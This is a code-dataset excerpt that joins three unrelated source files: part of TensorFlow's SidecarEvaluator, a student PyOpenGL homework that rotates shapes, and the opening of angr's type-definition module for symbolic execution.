checkpoints can be produced from the training side.
Example:
```python
model = tf.keras.models.Sequential(...)
model.compile(metrics=tf.keras.metrics.SparseCategoricalAccuracy(
name="eval_metrics"))
data = tf.data.Dataset.from_tensor_slices(...)
SidecarEvaluator(
model=model,
data=data,
checkpoint_dir='/tmp/checkpoint_dir', # dir for training-saved checkpoint
steps=None, # Eval until dataset is exhausted
max_evaluations=None, # The evaluation needs to be stopped manually
callbacks=[tf.keras.callbacks.TensorBoard(log_dir='/tmp/log_dir')]
).start()
```
`SidecarEvaluator.start` writes a series of summary
files which can be visualized by tensorboard (which provides a webpage link):
```bash
$ tensorboard --logdir=/tmp/log_dir/validation
...
TensorBoard 2.4.0a0 at http://host:port (Press CTRL+C to quit)
```
If the training cluster uses a CTL, the `checkpoint_dir` should contain
checkpoints that track both `model` and `optimizer`, to fulfill
`SidecarEvaluator`'s expectation. This can be done by a
`tf.train.Checkpoint` and a `tf.train.CheckpointManager`:
```python
checkpoint_dir = ... # Same `checkpoint_dir` supplied to `SidecarEvaluator`.
checkpoint = tf.train.Checkpoint(model=model, optimizer=optimizer)
checkpoint_manager = tf.train.CheckpointManager(
checkpoint, checkpoint_dir=..., max_to_keep=...)
checkpoint_manager.save()
```
If the training cluster uses Keras `Model.fit` API, a
`tf.keras.callbacks.ModelCheckpoint` should be used, with
`save_weights_only=True`, and the `filepath` should have 'ckpt-{epoch}'
appended:
```python
checkpoint_dir = ... # Same `checkpoint_dir` supplied to `SidecarEvaluator`.
model_checkpoint = tf.keras.callbacks.ModelCheckpoint(
filepath=os.path.join(checkpoint_dir, 'ckpt-{epoch}'),
save_weights_only=True)
model.fit(dataset, epochs, callbacks=[model_checkpoint])
```
"""
def __init__(self,
model,
data,
checkpoint_dir,
steps=None,
max_evaluations=None,
callbacks=None):
"""Initializes an `SidecarEvaluator` object.
Args:
model: Model to use for evaluation. The model object used here should be a
`tf.keras.Model`, and should be the same as the one that is used in
training, where `tf.keras.Model`s are checkpointed. The model should
have one or more metrics compiled before using `SidecarEvaluator`.
data: The input data for evaluation. `SidecarEvaluator` supports all data
types that Keras `model.evaluate` supports as the input data `x`, such
as a `tf.data.Dataset`.
checkpoint_dir: Directory where checkpoint files are saved.
steps: Number of steps to perform evaluation for, when evaluating a single
checkpoint file. If `None`, evaluation continues until the dataset is
exhausted. For repeated evaluation dataset, user must specify `steps` to
avoid infinite evaluation loop.
max_evaluations: Maximum number of the checkpoint file to be evaluated,
for `SidecarEvaluator` to know when to stop. The evaluator will stop
after it evaluates a checkpoint filepath ending with
'<ckpt_name>-<max_evaluations>'. If using
`tf.train.CheckpointManager.save` for saving checkpoints, the kth saved
checkpoint has the filepath suffix '<ckpt_name>-<k>' (k=1 for the first
saved), and if checkpoints are saved every epoch after training, the
filepath saved at the kth epoch would end with '<ckpt_name>-<k>. Thus,
if training runs for n epochs, and the evaluator should end after the
training finishes, use n for this parameter. Note that this is not
necessarily equal to the number of total evaluations, since some
checkpoints may be skipped if evaluation is slower than checkpoint
creation. If `None`, `SidecarEvaluator` will evaluate indefinitely, and
the user must terminate evaluator program themselves.
callbacks: List of `keras.callbacks.Callback` instances to apply during
evaluation. See [callbacks](/api_docs/python/tf/keras/callbacks).
"""
self.model = model
self.data = data
self.checkpoint_dir = checkpoint_dir
self._iterations = variables.Variable(
name='iterations',
initial_value=_ITERATIONS_UNINITIALIZED,
dtype=dtypes.int64)
self.max_evaluations = max_evaluations
self.steps = steps
self.callbacks = callbacks or []
def start(self):
"""Starts the evaluation loop."""
optimizer_checkpoint = tracking_util.Checkpoint(iter=self._iterations)
checkpoint = tracking_util.Checkpoint(
model=self.model, optimizer=optimizer_checkpoint)
for latest_checkpoint in checkpoint_utils.checkpoints_iterator(
self.checkpoint_dir):
try:
# `expect_partial` because the checkpoint can have other `Trackable`s
# such as `optimizer`.
checkpoint.restore(latest_checkpoint).expect_partial()
checkpoint_attributes = list_checkpoint_attributes(latest_checkpoint)
# The checkpoint should contain model and optimizer for SidecarEvaluator
# to work. But the model weights saved by ModelCheckpoint callback does
# not contain model as an attribute. To make SidecarEvaluator compatibly
# work in this case, use model.load_weights to load the model's weights,
# while self._iterations is still restored by checkpoint variable.
if 'model' not in checkpoint_attributes:
self.model.load_weights(latest_checkpoint)
# The model checkpoint might not include optimizer in cases, e.g.
# using a custom training loop. Directly assign the iterations
# property to be used in callbacks.
if self.model.optimizer:
self.model.optimizer.iterations.assign(self._iterations)
except (errors_impl.OpError,) as e:
# A couple errors can happen here with the coordinator racing to write
# checkpoint:
# 1) OpError: open failed for <file path>: No such file or directory
# 2) NotFoundError (subclass of OpError): Unsuccessful
# TensorSliceReader constructor.
# TODO(rchao): Remove this except block once b/150954027 is resolved.
logging.info(
'SidecarEvaluator has an error loading '
'checkpoint: %s. Retrying. Error: %s: %s', latest_checkpoint,
e.__class__.__name__, e)
continue
if self._iterations.numpy() == _ITERATIONS_UNINITIALIZED:
raise RuntimeError(
'`iterations` cannot be loaded from the '
'checkpoint file. Please ensure `iterations` is '
'tracked in the `checkpoint` saved by the coordinator.')
logging.info(
'Evaluation starts: Model weights loaded from latest '
'checkpoint file: %s.', latest_checkpoint)
self.model.evaluate(
self.data, steps=self.steps, callbacks=self.callbacks, verbose=2)
return_metrics = {}
for metric in self.model.metrics:
result = metric.result()
if isinstance(result, dict):
return_metrics.update(result)
else:
return_metrics[metric.name] = result
logging.info(
'End of evaluation. Metrics: %s', ' '.join([
'{}={}'.format(name, value.numpy())
for name, value in return_metrics.items()
]))
# TODO(rchao): Make the max evaluation robust in case users save the
# checkpoints with epoch format {epoch:03d}.
if (self.max_evaluations and
latest_checkpoint.endswith('-{}'.format(self.max_evaluations))):
# Exit the loop because we have evaluated the final checkpoint file.
logging.info('Last checkpoint evaluated. SidecarEvaluator stops.')
return
| tensorflow/tensorflow | tensorflow/python/keras/distribute/sidecar_evaluator.py | Python | apache-2.0 | 11,398 |
from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
import random as random
import numpy as np
import sys
fill, view = True, True
width, height = 1000, 1000
theta, sign = 0.0, 1.0
rotate = 0
ex = 0
ey = 0
ez = 8
#trianger
obA = [ [3.0 , 0.0] ,[6.0, 0.0] , [4.5, 3.0] ]
#rect
obB = [[3.0,0.0] ,[6.0, -3.0] ]
def InitGL():
glClearColor(0.0, 0.0, 0.0, 0.0)
glEnable(GL_DEPTH_TEST)
def SetGLScene():
if fill:
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
else:
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
if view:
gluPerspective(90., 1., 0.5, 80.)
else:
glOrtho(-10, 10, -10, 10, -10, 10)
#gluPerspective(90.0, float(width) / float(height), 0.1, 100.0)
#glMatrixMode(GL_MODELVIEW)
#glLoadIdentity()
#gluLookAt(0, 0, 8, 0, 0, 0, 0, 1, 0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(ex, ey, ez, 0, 0, 0, 0, 1, 0)
def Surface(sx,sy,sz,r,g,b):
glBegin(GL_QUADS)
(m,n,o) = sur.shape
for i in range(m):
r[0] = r[0] + 0.1; b[0] = b[0] - 0.1
glColor3f(r[0], g[0], b[0])
for j in range(n):
glVertex3f(sur[i,j,0] + sx, sur[i,j,1] + sy, sur[i,j,2]+ sz)
glEnd()
def SetFrame():
glPushMatrix()
glBegin(GL_LINES)
glColor3f(1.0,0.0,0.0)
glVertex2f(-10.,0.)
glVertex2f( 10., 0.)
glColor3f(0.0,1.0,0.0)
glVertex2f( 0., -10.)
glVertex2f( 0., 10.)
glEnd()
glPopMatrix()
glPushMatrix()
glPolygonMode(GL_FRONT_AND_BACK,GL_LINE)
glBegin(GL_POLYGON)
glColor3f(0.5,0.0,0.0)
glVertex2f(-10,-10)
glVertex2f( -10, 10)
glVertex2f( 10, 10)
glVertex2f( 10, -10)
glEnd()
glPopMatrix()
def DrawGLScene():
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
SetFrame()
SetGLScene()
# drawing
glPushMatrix()
#glRotatef(random.random()*theta,0,1,0)
glBegin(GL_TRIANGLES)
glColor3f(random.random() , random.random() , random.random())
glVertex2f( obA[0][0] , obA[0][1])
glVertex2f(obA[1][0] , obA[0][1] )
glVertex2f(obA[2][0], obA[2][1])
glEnd()
glPopMatrix()
glPushMatrix()
#glPolygonMode(GL_FRONT_AND_BACK,GL_LINE)
glBegin(GL_POLYGON)
glVertex2f(obB[0][0], obB[0][1])
glVertex2f(obB[1][0] , obB[0][1])
glVertex2f(obB[1][0], obB[0][1])
glVertex2f(obB[1][0] , obB[1][1])
glVertex2f(obB[1][0], obB[1][1])
glVertex2f(obB[0][0] , obB[1][1])
glVertex2f(obB[0][0], obB[1][1])
glVertex2f(obB[0][0] , obB[0][1])
glEnd()
glPopMatrix()
# rotate and resize
glPushMatrix()
glRotatef(rotate,0,0,1)
glScalef(0.5,0.5,0.5)
#glTranslatef(0.0,0.0,0.0)
glBegin(GL_TRIANGLES)
glColor3f(random.random() , random.random() , random.random())
glVertex2f( obA[0][0] , obA[0][1])
glVertex2f(obA[1][0] , obA[0][1] )
glVertex2f(obA[2][0], obA[2][1])
glEnd()
glPopMatrix()
glPushMatrix()
glRotatef(rotate,0,0,1)
glScalef(0.5,0.5,0.5)
#glTranslatef(0.0,0.0,0.0)
#glPolygonMode(GL_FRONT_AND_BACK,GL_LINE)
glBegin(GL_POLYGON)
glVertex2f(obB[0][0], obB[0][1])
glVertex2f(obB[1][0] , obB[0][1])
glVertex2f(obB[1][0], obB[0][1])
glVertex2f(obB[1][0] , obB[1][1])
glVertex2f(obB[1][0], obB[1][1])
glVertex2f(obB[0][0] , obB[1][1])
glVertex2f(obB[0][0], obB[1][1])
glVertex2f(obB[0][0] , obB[0][1])
glEnd()
glPopMatrix()
# Make sure changes appear onscreen
glutSwapBuffers()
def On_keyboard(key, x, y):
global ex
global ey
global ez
global fill, view
while True:
if key == b'\x1b':
sys.exit()
if key == b'f':
fill = not fill
break
if key == b'v':
view = not view
break
if key == b'1':
ex = ex + 1
break
if key == b'2':
ex = ex - 1
break;
if key == b'3':
ey = ey + 1
break
if key == b'4':
ey = ey - 1
break;
if key == b'5':
ez = ez + 1
break
if key == b'6':
ez = ez - 1
break;
if key == b'7':
ex = 0
ey = 0
ez = 7
break;
break
print ("key press " + key)
glutPostRedisplay()
def MyIdle():
global theta, sign
global rotate
theta = theta + (0.2*sign)
if ((theta >= 360.0) | (theta <= 0.0)):
sign = sign*(-1)
if (rotate >= 270):
rotate = rotate
else:
rotate = rotate + 0.25
glutPostRedisplay()
def On_reshape(w, h):
global width, height
width, height = w, h
def main():
glutInit(sys.argv)
glutInitWindowSize(width, height)
glutInitWindowPosition(0,0)
glutInitDisplayMode(GLUT_RGB | GLUT_DOUBLE | GLUT_DEPTH)
glutCreateWindow(b'cube')
InitGL()
glutDisplayFunc(DrawGLScene)
glutKeyboardFunc(On_keyboard)
glutReshapeFunc(On_reshape)
glutIdleFunc(MyIdle)
glutMainLoop()
if __name__ == "__main__":
main()
| dewtx29/python_ann | project/cg/homework/1_rotate_object.py | Python | gpl-3.0 | 5,874 |
from collections import OrderedDict, defaultdict
from .misc.ux import deprecated
import copy
import re
import logging
import claripy
l = logging.getLogger(name=__name__)
# pycparser hack to parse type expressions
errorlog = logging.getLogger(name=__name__ + ".yacc")
errorlog.setLevel(logging.ERROR)
try:
import pycparser
except ImportError:
pycparser = None
class SimType:
"""
SimType exists to track type information for SimProcedures.
"""
_fields = ()
_arch = None
_size = None
_can_refine_int = False
base = True
def __init__(self, label=None):
"""
:param label: the type label.
"""
self.label = label
def __eq__(self, other):
if type(self) != type(other):
return False
for attr in self._fields:
if attr == 'size' and self._arch is None and other._arch is None:
continue
if getattr(self, attr) != getattr(other, attr):
return False
return True
def __ne__(self, other):
# wow many efficient
return not self == other
def __hash__(self):
# very hashing algorithm many secure wow
out = hash(type(self))
for attr in self._fields:
out ^= hash(getattr(self, attr))
return out
@property
def name(self):
return repr(self)
def _refine_dir(self): # pylint: disable=no-self-use
return []
def _refine(self, view, k): # pylint: disable=unused-argument,no-self-use
raise KeyError("{} is not a valid refinement".format(k))
@property
def size(self):
"""
The size of the type in bits.
"""
if self._size is not None:
return self._size
return NotImplemented
@property
def alignment(self):
"""
The alignment of the type in bytes.
"""
if self._arch is None:
return NotImplemented
return self.size // self._arch.byte_width
def with_arch(self, arch):
if self._arch is not None and self._arch == arch:
return self
else:
return self._with_arch(arch)
def _with_arch(self, arch):
cp = copy.copy(self)
cp._arch = arch
return cp
def _init_str(self):
return "NotImplemented(%s)" % (self.__class__.__name__)
class SimTypeBottom(SimType):
"""
SimTypeBottom basically represents a type error.
"""
def __repr__(self):
return 'BOT'
def _init_str(self):
return "%s()" % self.__class__.__name__
class SimTypeTop(SimType):
"""
SimTypeTop represents any type (mostly used with a pointer for void*).
"""
_fields = ('size',)
def __init__(self, size=None, label=None):
SimType.__init__(self, label)
self._size = size
def __repr__(self):
return 'TOP'
class SimTypeReg(SimType):
"""
SimTypeReg is the base type for all types that are register-sized.
"""
_fields = ('size',)
def __init__(self, size, label=None):
"""
:param label: the type label.
:param size: the size of the type (e.g. 32bit, 8bit, etc.).
"""
SimType.__init__(self, label=label)
self._size = size
def __repr__(self):
return "reg{}_t".format(self.size)
def extract(self, state, addr, concrete=False):
# TODO: EDG says this looks dangerously closed-minded. Just in case...
assert self.size % state.arch.byte_width == 0
out = state.memory.load(addr, self.size // state.arch.byte_width, endness=state.arch.memory_endness)
if not concrete:
return out
return state.solver.eval(out)
def store(self, state, addr, value):
store_endness = state.arch.memory_endness
if isinstance(value, claripy.ast.Bits):
if value.size() != self.size:
raise ValueError("size of expression is wrong size for type")
elif isinstance(value, int):
value = state.solver.BVV(value, self.size)
elif isinstance(value, bytes):
store_endness = 'Iend_BE'
else:
raise TypeError("unrecognized expression type for SimType {}".format(type(self).__name__))
state.memory.store(addr, value, endness=store_endness)
class SimTypeNum(SimType):
"""
SimTypeNum is a numeric type of arbitrary length
"""
_fields = SimType._fields + ('signed', 'size')
def __init__(self, size, signed=True, label=None):
"""
:param size: The size of the integer, in bytes
:param signed: Whether the integer is signed or not
:param label: A label for the type
"""
super(SimTypeNum, self).__init__(label)
self._size = size
self.signed = signed
def __repr__(self):
return "{}int{}_t".format('' if self.signed else 'u', self.size)
def extract(self, state, addr, concrete=False):
out = state.memory.load(addr, self.size // state.arch.byte_width, endness=state.arch.memory_endness)
if not concrete:
return out
n = state.solver.eval(out)
if self.signed and n >= 1 << (self.size-1):
n -= 1 << (self.size)
return n
def store(self, state, addr, value):
store_endness = state.arch.memory_endness
if isinstance(value, claripy.ast.Bits):
if value.size() != self.size:
raise ValueError("size of expression is wrong size for type")
elif isinstance(value, int):
value = state.solver.BVV(value, self.size)
elif isinstance(value, bytes):
store_endness = 'Iend_BE'
else:
raise TypeError("unrecognized expression type for SimType {}".format(type(self).__name__))
state.memory.store(addr, value, endness=store_endness)
class SimTypeInt(SimTypeReg):
"""
SimTypeInt is a type that specifies a signed or unsigned C integer.
"""
_fields = SimTypeReg._fields + ('signed',)
_base_name = 'int'
def __init__(self, signed=True, label=None):
"""
:param signed: True if signed, False if unsigned
:param label: The type label
"""
super(SimTypeInt, self).__init__(None, label=label)
self.signed = signed
def __repr__(self):
name = self._base_name
if not self.signed:
name = 'unsigned ' + name
try:
return name + ' (%d bits)' % self.size
except ValueError:
return name
@property
def size(self):
if self._arch is None:
raise ValueError("Can't tell my size without an arch!")
try:
return self._arch.sizeof[self._base_name]
except KeyError:
raise ValueError("Arch %s doesn't have its %s type defined!" % (self._arch.name, self._base_name))
def extract(self, state, addr, concrete=False):
out = state.memory.load(addr, self.size // state.arch.byte_width, endness=state.arch.memory_endness)
if not concrete:
return out
n = state.solver.eval(out)
if self.signed and n >= 1 << (self.size-1):
n -= 1 << self.size
return n
def _init_str(self):
return "%s(signed=%s, label=%s)" % (
self.__class__.__name__,
self.signed,
'"%s"' % self.label if self.label is not None else "None",
)
def _refine_dir(self):
return ['signed', 'unsigned']
def _refine(self, view, k):
if k == 'signed':
ty = copy.copy(self)
ty.signed = True
elif k == 'unsigned':
ty = copy.copy(self)
ty.signed = False
else:
raise KeyError(k)
return view._deeper(ty=ty)
class SimTypeShort(SimTypeInt):
_base_name = 'short'
class SimTypeLong(SimTypeInt):
_base_name = 'long'
class SimTypeLongLong(SimTypeInt):
_base_name = 'long long'
class SimTypeChar(SimTypeReg):
"""
SimTypeChar is a type that specifies a character;
this could be represented by a byte, but this is meant to be interpreted as a character.
"""
def __init__(self, label=None):
"""
:param label: the type label.
"""
# FIXME: Now the size of a char is state-dependent.
SimTypeReg.__init__(self, 8, label=label)
self.signed = False
def __repr__(self):
return 'char'
def store(self, state, addr, value):
# FIXME: This is a hack.
self._size = state.arch.byte_width
try:
super(SimTypeChar, self).store(state, addr, value)
except TypeError:
if isinstance(value, bytes) and len(value) == 1:
value = state.solver.BVV(value[0], state.arch.byte_width)
super(SimTypeChar, self).store(state, addr, value)
else:
raise
def extract(self, state, addr, concrete=False):
# FIXME: This is a hack.
self._size = state.arch.byte_width
out = super(SimTypeChar, self).extract(state, addr, concrete)
if concrete:
return bytes([out])
return out
def _init_str(self):
return "%s(label=%s)" % (
self.__class__.__name__,
'"%s"' if self.label is not None else "None",
)
class SimTypeBool(SimTypeChar):
def __repr__(self):
return 'bool'
def store(self, state, addr, value):
return super(SimTypeBool, self).store(state, addr, int(value))
def extract(self, state, addr, concrete=False):
ver = super(SimTypeBool, self).extract(state, addr, concrete)
if concrete:
return ver != b'\0'
return ver != 0
def _init_str(self):
return "%s()" % (self.__class__.__name__)
class SimTypeFd(SimTypeReg):
"""
SimTypeFd is a type that specifies a file descriptor.
"""
_fields = SimTypeReg._fields
def __init__(self, label=None):
"""
:param label: the type label
"""
# file descriptors are always 32 bits, right?
# TODO: That's so closed-minded!
super(SimTypeFd, self).__init__(32, label=label)
def __repr__(self):
return 'fd_t'
class SimTypePointer(SimTypeReg):
"""
SimTypePointer is a type that specifies a pointer to some other type.
"""
_fields = SimTypeReg._fields + ('pts_to',)
def __init__(self, pts_to, label=None, offset=0):
"""
:param label: The type label.
:param pts_to: The type to which this pointer points to.
"""
super(SimTypePointer, self).__init__(None, label=label)
self.pts_to = pts_to
self.signed = False
self.offset = offset
def __repr__(self):
return '{}*'.format(self.pts_to)
def make(self, pts_to):
new = type(self)(pts_to)
new._arch = self._arch
return new
@property
def size(self):
if self._arch is None:
raise ValueError("Can't tell my size without an arch!")
return self._arch.bits
def _with_arch(self, arch):
out = SimTypePointer(self.pts_to.with_arch(arch), self.label)
out._arch = arch
return out
def _init_str(self):
return "%s(%s, label=%s, offset=%d)" % (
self.__class__.__name__,
self.pts_to._init_str(),
'"%s"' % self.label if self.label is not None else "None",
self.offset
)
class SimTypeFixedSizeArray(SimType):
"""
SimTypeFixedSizeArray is a literal (i.e. not a pointer) fixed-size array.
"""
def __init__(self, elem_type, length):
super(SimTypeFixedSizeArray, self).__init__()
self.elem_type = elem_type
self.length = length
def __repr__(self):
return '{}[{}]'.format(self.elem_type, self.length)
_can_refine_int = True
def _refine(self, view, k):
return view._deeper(addr=view._addr + k * (self.elem_type.size//view.state.arch.byte_width), ty=self.elem_type)
def extract(self, state, addr, concrete=False):
return [self.elem_type.extract(state, addr + i*(self.elem_type.size//state.arch.byte_width), concrete) for i in range(self.length)]
def store(self, state, addr, values):
for i, val in enumerate(values):
self.elem_type.store(state, addr + i*(self.elem_type.size//8), val)
@property
def size(self):
return self.elem_type.size * self.length
@property
def alignment(self):
return self.elem_type.alignment
def _with_arch(self, arch):
out = SimTypeFixedSizeArray(self.elem_type.with_arch(arch), self.length)
out._arch = arch
return out
def _init_str(self):
return "%s(%s, %d)" % (
self.__class__.__name__,
self.elem_type._init_str(),
self.length,
)
class SimTypeArray(SimType):
"""
SimTypeArray is a type that specifies a pointer to an array; while it is a pointer, it has a semantic difference.
"""
_fields = ('elem_type', 'length')
def __init__(self, elem_type, length=None, label=None):
"""
:param label: The type label.
:param elem_type: The type of each element in the array.
:param length: An expression of the length of the array, if known.
"""
super(SimTypeArray, self).__init__(label=label)
self.elem_type = elem_type
self.length = length
def __repr__(self):
return '{}[{}]'.format(self.elem_type, '' if self.length is None else self.length)
@property
def size(self):
if self._arch is None:
raise ValueError("I can't tell my size without an arch!")
return self._arch.bits
@property
def alignment(self):
return self.elem_type.alignment
def _with_arch(self, arch):
out = SimTypeArray(self.elem_type.with_arch(arch), self.length, self.label)
out._arch = arch
return out
class SimTypeString(SimTypeArray):
"""
SimTypeString is a type that represents a C-style string,
i.e. a NUL-terminated array of bytes.
"""
_fields = SimTypeArray._fields + ('length',)
def __init__(self, length=None, label=None):
"""
:param label: The type label.
:param length: An expression of the length of the string, if known.
"""
super(SimTypeString, self).__init__(SimTypeChar(), label=label, length=length)
def __repr__(self):
return 'string_t'
def extract(self, state, addr, concrete=False):
if self.length is None:
out = None
last_byte = state.memory.load(addr, 1)
# if we try to extract a symbolic string, it's likely that we are going to be trapped in a very large loop.
if state.solver.symbolic(last_byte):
raise ValueError("Trying to extract a symbolic string at %#x" % state.solver.eval(addr))
addr += 1
while not (claripy.is_true(last_byte == 0) or state.solver.symbolic(last_byte)):
out = last_byte if out is None else out.concat(last_byte)
last_byte = state.memory.load(addr, 1)
addr += 1
else:
out = state.memory.load(addr, self.length)
if not concrete:
return out if out is not None else claripy.BVV(0, 0)
else:
return state.solver.eval(out, cast_to=bytes) if out is not None else ''
_can_refine_int = True
def _refine(self, view, k):
return view._deeper(addr=view._addr + k, ty=SimTypeChar())
@property
def size(self):
if self.length is None:
return 4096 # :/
return (self.length + 1) * 8
@property
def alignment(self):
return 1
def _with_arch(self, arch):
return self
class SimTypeWString(SimTypeArray):
"""
A wide-character null-terminated string, where each character is 2 bytes.
"""
_fields = SimTypeArray._fields + ('length',)
def __init__(self, length=None, label=None):
super(SimTypeWString, self).__init__(SimTypeNum(16, False), label=label, length=length)
def __repr__(self):
return 'wstring_t'
def extract(self, state, addr, concrete=False):
if self.length is None:
out = None
last_byte = state.memory.load(addr, 2)
# if we try to extract a symbolic string, it's likely that we are going to be trapped in a very large loop.
if state.solver.symbolic(last_byte):
raise ValueError("Trying to extract a symbolic string at %#x" % state.solver.eval(addr))
addr += 2
while not (claripy.is_true(last_byte == 0) or state.solver.symbolic(last_byte)):
out = last_byte if out is None else out.concat(last_byte)
last_byte = state.memory.load(addr, 2)
addr += 2
else:
out = state.memory.load(addr, self.length*2)
if out is None: out = claripy.BVV(0, 0)
if not concrete:
return out
else:
return u''.join(chr(state.solver.eval(x.reversed if state.arch.memory_endness == 'Iend_LE' else x)) for x in out.chop(16))
_can_refine_int = True
def _refine(self, view, k):
return view._deeper(addr=view._addr + k * 2, ty=SimTypeNum(16, False))
@property
def size(self):
if self.length is None:
return 4096
return (self.length * 2 + 2) * 8
@property
def alignment(self):
return 2
def _with_arch(self, arch):
return self
class SimTypeFunction(SimType):
"""
SimTypeFunction is a type that specifies an actual function (i.e. not a pointer) with certain types of arguments and
a certain return value.
"""
_fields = ('args', 'returnty')
base = False
def __init__(self, args, returnty, label=None, arg_names=None):
"""
:param label: The type label
:param args: A tuple of types representing the arguments to the function
:param returnty: The return type of the function, or none for void
"""
super(SimTypeFunction, self).__init__(label=label)
self.args = args
self.returnty = returnty
self.arg_names = arg_names if arg_names else []
def __repr__(self):
return '({}) -> {}'.format(', '.join(str(a) for a in self.args), self.returnty)
@property
def size(self):
return 4096 # ???????????
def _with_arch(self, arch):
out = SimTypeFunction([a.with_arch(arch) for a in self.args], self.returnty.with_arch(arch), self.label)
out._arch = arch
return out
def _init_str(self):
return "%s([%s], %s, label=%s)" % (
self.__class__.__name__,
", ".join([arg._init_str() for arg in self.args]),
self.returnty._init_str(),
self.label
)
class SimTypeLength(SimTypeLong):
"""
SimTypeLength is a type that specifies the length of some buffer in memory.
...I'm not really sure what the original design of this class was going for
"""
_fields = SimTypeNum._fields + ('addr', 'length') # ?
def __init__(self, signed=False, addr=None, length=None, label=None):
"""
:param signed: Whether the value is signed or not
:param label: The type label.
:param addr: The memory address (expression).
:param length: The length (expression).
"""
super(SimTypeLength, self).__init__(signed=signed, label=label)
self.addr = addr
self.length = length
def __repr__(self):
return 'size_t'
@property
def size(self):
if self._arch is None:
raise ValueError("I can't tell my size without an arch!")
return self._arch.bits
def _init_str(self):
return "%s(size=%d)" % (
self.__class__.__name__,
self.size
)
class SimTypeFloat(SimTypeReg):
"""
An IEEE754 single-precision floating point number
"""
def __init__(self, size=32):
super(SimTypeFloat, self).__init__(size)
sort = claripy.FSORT_FLOAT
signed = True
def extract(self, state, addr, concrete=False):
itype = claripy.fpToFP(super(SimTypeFloat, self).extract(state, addr, False), self.sort)
if concrete:
return state.solver.eval(itype)
return itype
def store(self, state, addr, value):
if type(value) in (int, float):
value = claripy.FPV(float(value), self.sort)
return super(SimTypeFloat, self).store(state, addr, value)
def __repr__(self):
return 'float'
class SimTypeDouble(SimTypeFloat):
"""
An IEEE754 double-precision floating point number
"""
def __init__(self, align_double=True):
self.align_double = align_double
super(SimTypeDouble, self).__init__(64)
sort = claripy.FSORT_DOUBLE
def __repr__(self):
return 'double'
@property
def alignment(self):
return 8 if self.align_double else 4
def _init_str(self):
return "%s(align_double=%s)" % (
self.__class__.__name__,
self.align_double
)
class SimStruct(SimType):
_fields = ('name', 'fields')
def __init__(self, fields, name=None, pack=False, align=None):
super(SimStruct, self).__init__(None)
self._pack = pack
self._name = '<anon>' if name is None else name
self._align = align
self._pack = pack
self.fields = fields
self._arch_memo = {}
@property
def name(self): # required bc it's a property in the original
return self._name
@property
def offsets(self):
offsets = {}
offset_so_far = 0
for name, ty in self.fields.items():
if not self._pack:
align = ty.alignment
if offset_so_far % align != 0:
offset_so_far += (align - offset_so_far % align)
offsets[name] = offset_so_far
offset_so_far += ty.size // self._arch.byte_width
return offsets
def extract(self, state, addr, concrete=False):
values = {}
for name, offset in self.offsets.items():
ty = self.fields[name]
v = SimMemView(ty=ty, addr=addr+offset, state=state)
if concrete:
values[name] = v.concrete
else:
values[name] = v.resolved
return SimStructValue(self, values=values)
def _with_arch(self, arch):
if arch.name in self._arch_memo:
return self._arch_memo[arch.name]
out = SimStruct(None, name=self.name, pack=self._pack, align=self._align)
out._arch = arch
self._arch_memo[arch.name] = out
out.fields = OrderedDict((k, v.with_arch(arch)) for k, v in self.fields.items())
return out
def __repr__(self):
return 'struct %s' % self.name
@property
def size(self):
return sum(val.size for val in self.fields.values())
@property
def alignment(self):
if self._align is not None:
return self._align
return max(val.alignment for val in self.fields.values())
def _refine_dir(self):
return list(self.fields.keys())
def _refine(self, view, k):
offset = self.offsets[k]
ty = self.fields[k]
return view._deeper(ty=ty, addr=view._addr + offset)
def store(self, state, addr, value):
if type(value) is dict:
pass
elif type(value) is SimStructValue:
value = value._values
else:
raise TypeError("Can't store struct of type %s" % type(value))
if len(value) != len(self.fields):
raise ValueError("Passed bad values for %s; expected %d, got %d" % (self, len(self.offsets), len(value)))
for field, offset in self.offsets.items():
ty = self.fields[field]
ty.store(state, addr + offset, value[field])
def _init_str(self):
return "%s([%s], name=\"%s\", pack=%s, align=%s)" % (
self.__class__.__name__,
", ".join([f._init_str() for f in self.fields]),
self._name,
self._pack,
self._align,
)
class SimStructValue:
"""
A SimStruct type paired with some real values
"""
def __init__(self, struct, values=None):
"""
:param struct: A SimStruct instance describing the type of this struct
:param values: A mapping from struct fields to values
"""
self._struct = struct
self._values = defaultdict(lambda: None, values or ())
def __repr__(self):
fields = ('.{} = {}'.format(name, self._values[name]) for name in self._struct.fields)
return '{{\n {}\n}}'.format(',\n '.join(fields))
def __getattr__(self, k):
return self[k]
def __getitem__(self, k):
if type(k) is int:
return self._values[self._struct.fields[k]]
return self._values[k]
class SimUnion(SimType):
_fields = ('members', 'name')
def __init__(self, members, name=None, label=None):
"""
:param members: The members of the union, as a mapping name -> type
:param name: The name of the union
"""
super(SimUnion, self).__init__(label)
self._name = name if name is not None else '<anon>'
self.members = members
@property
def name(self):
return self._name
@property
def size(self):
return max(ty.size for ty in self.members.values())
@property
def alignment(self):
return max(val.alignment for val in self.members.values())
def __repr__(self):
# use the str instead of repr of each member to avoid exceed recursion
# depth when representing self-referential unions
return 'union %s {\n\t%s\n}' % (self.name, '\n\t'.join('%s %s;' % (name, str(ty)) for name, ty in self.members.items()))
def __str__(self):
return 'union %s' % (self.name, )
def _with_arch(self, arch):
out = SimUnion({name: ty.with_arch(arch) for name, ty in self.members.items()}, self.label)
out._arch = arch
return out
BASIC_TYPES = {
'char': SimTypeChar(),
'signed char': SimTypeChar(),
'unsigned char': SimTypeChar(),
'short': SimTypeShort(True),
'signed short': SimTypeShort(True),
'unsigned short': SimTypeShort(False),
'short int': SimTypeShort(True),
'signed short int': SimTypeShort(True),
'unsigned short int': SimTypeShort(False),
'int': SimTypeInt(True),
'signed int': SimTypeInt(True),
'unsigned int': SimTypeInt(False),
'long': SimTypeLong(True),
'signed long': SimTypeLong(True),
'unsigned long': SimTypeLong(False),
'long int': SimTypeLong(True),
'signed long int': SimTypeLong(True),
'unsigned long int': SimTypeLong(False),
'long long': SimTypeLongLong(True),
'signed long long': SimTypeLongLong(True),
'unsigned long long': SimTypeLongLong(False),
'long long int': SimTypeLongLong(True),
'signed long long int': SimTypeLongLong(True),
'unsigned long long int': SimTypeLongLong(False),
'float': SimTypeFloat(),
'double': SimTypeDouble(),
'void': SimTypeBottom(),
}
ALL_TYPES = {
